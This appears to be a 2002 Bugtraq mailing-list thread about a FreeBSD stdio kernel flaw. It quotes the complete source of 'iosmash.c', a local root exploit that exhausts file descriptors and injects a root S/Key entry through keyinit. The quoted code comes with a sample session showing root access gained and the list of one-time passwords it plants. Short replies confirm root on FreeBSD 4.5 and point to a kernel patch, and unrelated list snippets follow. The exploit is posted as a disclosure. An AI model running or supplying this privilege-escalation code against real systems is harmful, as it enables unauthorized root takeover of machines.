Re: cheers

From: Onie Camara (neil@restricted.dyndns.org)
Date: 04/25/02


From: "Onie Camara" <neil@restricted.dyndns.org>
To: "zeno" <bugtraq@cgisecurity.net>
Date: Wed, 24 Apr 2002 23:01:57 -0500

Thanks. This is what I did to one of my client's freebsd. Patch actually
complained. It asked me to reverse. :-)

----- Original Message -----
From: "zeno" <bugtraq@cgisecurity.net>
To: "Onie Camara" <neil@restricted.dyndns.org>
Cc: "KF" <dotslash@snosoft.com>; "bugtraq" <bugtraq@securityfocus.org>;
"vuln-dev" <vuln-dev@security-focus.com>
Sent: Wednesday, April 24, 2002 3:58 PM
Subject: Re: cheers

> >
> > Even on my FreeBSD 4.5 STABLE, I got root access. This is terrifying.
:-)
> >
> > So any solutions?
>
> cvsup new source rebuild kernel. A patch is out already.
>
> - zeno@cgisecurity.com
>
> >
> > ----- Original Message -----
> > From: "KF" <dotslash@snosoft.com>
> > To: "bugtraq" <bugtraq@securityfocus.org>; "vuln-dev"
> > <vuln-dev@security-focus.com>
> > Sent: Tuesday, April 23, 2002 1:24 AM
> > Subject: cheers
> >
> >
> > > http://www.phased.home.ro/iosmash.c
> > >
> > > -KF
> > >
> > >
> >
> >
>
> --------------------------------------------------------------------------

--
> > ----
> >
> >
> > >
> > > /*
> > >   phased/b10z
> > >   phased@snosoft.com
> > >   23/04/2002
> > >
> > >   stdio kernel bug in All releases of FreeBSD up to and including
> > 4.5-RELEASE
> > >   decided to make a trivial exploit to easily get root :)
> > >
> > >   > id
> > >   uid=1003(phased) gid=999(phased) groups=999(phased)
> > >   > ./iosmash
> > >   Adding phased:
> > >   <--- HIT CTRL-C --->
> > >   > su
> > >   s/key 98 snosoft2
> > >   Password:MASS OAT ROLL TOOL AGO CAM
> > >   xes#
> > >
> > >   this program makes the following skeys valid
> > >
> > >   95: CARE LIVE CARD LOFT CHIC HILL
> > >   96: TESS OIL WELD DUD MUTE KIT
> > >   97: DADE BED DRY JAW GRAB NOV
> > >   98: MASS OAT ROLL TOOL AGO CAM
> > >   99: DARK LEW JOLT JIVE MOS WHO
> > >
> > >   http://www.snosoft.com
> > >   cheers Joost Pol
> > > */
> > >
> > > #include <stdio.h>
> > > #include <unistd.h>
> > >
> > > int main(int argc, char *argv[]) {
> > > while(dup(1) != -1);
> > > close(2);
> > > execl("/usr/bin/keyinit",
> > > "\nroot 0099 snosoft2 6f648e8bd0e2988a     Apr 23,2666 01:02:03\n");
> > > }
> > >
> > >
> >
> >
>
>



Relevant Pages

  • Re: [OT] Q: what would you choose for a VCS today
    ... FreeBSD as base that would allow better teams cooperation and easy code ... control fly out the window from, say, the 42nd floor. ... If you think you need a vendor branch, take a look at mercurial patch ... Patch queues are quite powerful, and even though you end up versioning ...
    (freebsd-hackers)
  • RE: For the love of God, is it even possible to make the Atheros ath.patch & updated HALactually
    ... > # mv ath_hal_20051212 ath ... in hopes that maybe the patch was FINALLY ... This FreeBSD installation is sitting here doing ... To June/July 2005 madwifi was very unstable, after merging cvs BSD tree of ...
    (freebsd-current)
  • Re: NAT-T patch for 7-STABLE
    ... the NAT-T patch from HEAD to 7-STABLE: ... I also merged back the NAT-T changes from FreeBSD 8/HEAD. ... (basically the cvs checkout and the tarball creation; ... and the port isn't ready to be used as a automatic port as you have to do ...
    (freebsd-net)
  • Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv
    ... > There's no patch for these, and in the case of the embedded ... >>FreeBSD only: NO ... In a few instances in the resolver code, ... >>can spoof DNS messages) may produce a specially crafted DNS message ...
    (FreeBSD-Security)
  • Re: FreeBSD 6.0 compat with DL320 G4
    ... The patch I created makes the broadcom chip work without panicing ... FreeBSD 6.0 compat with DL320 G4 ... this server also has bge interfaces and had no ...
    (freebsd-questions)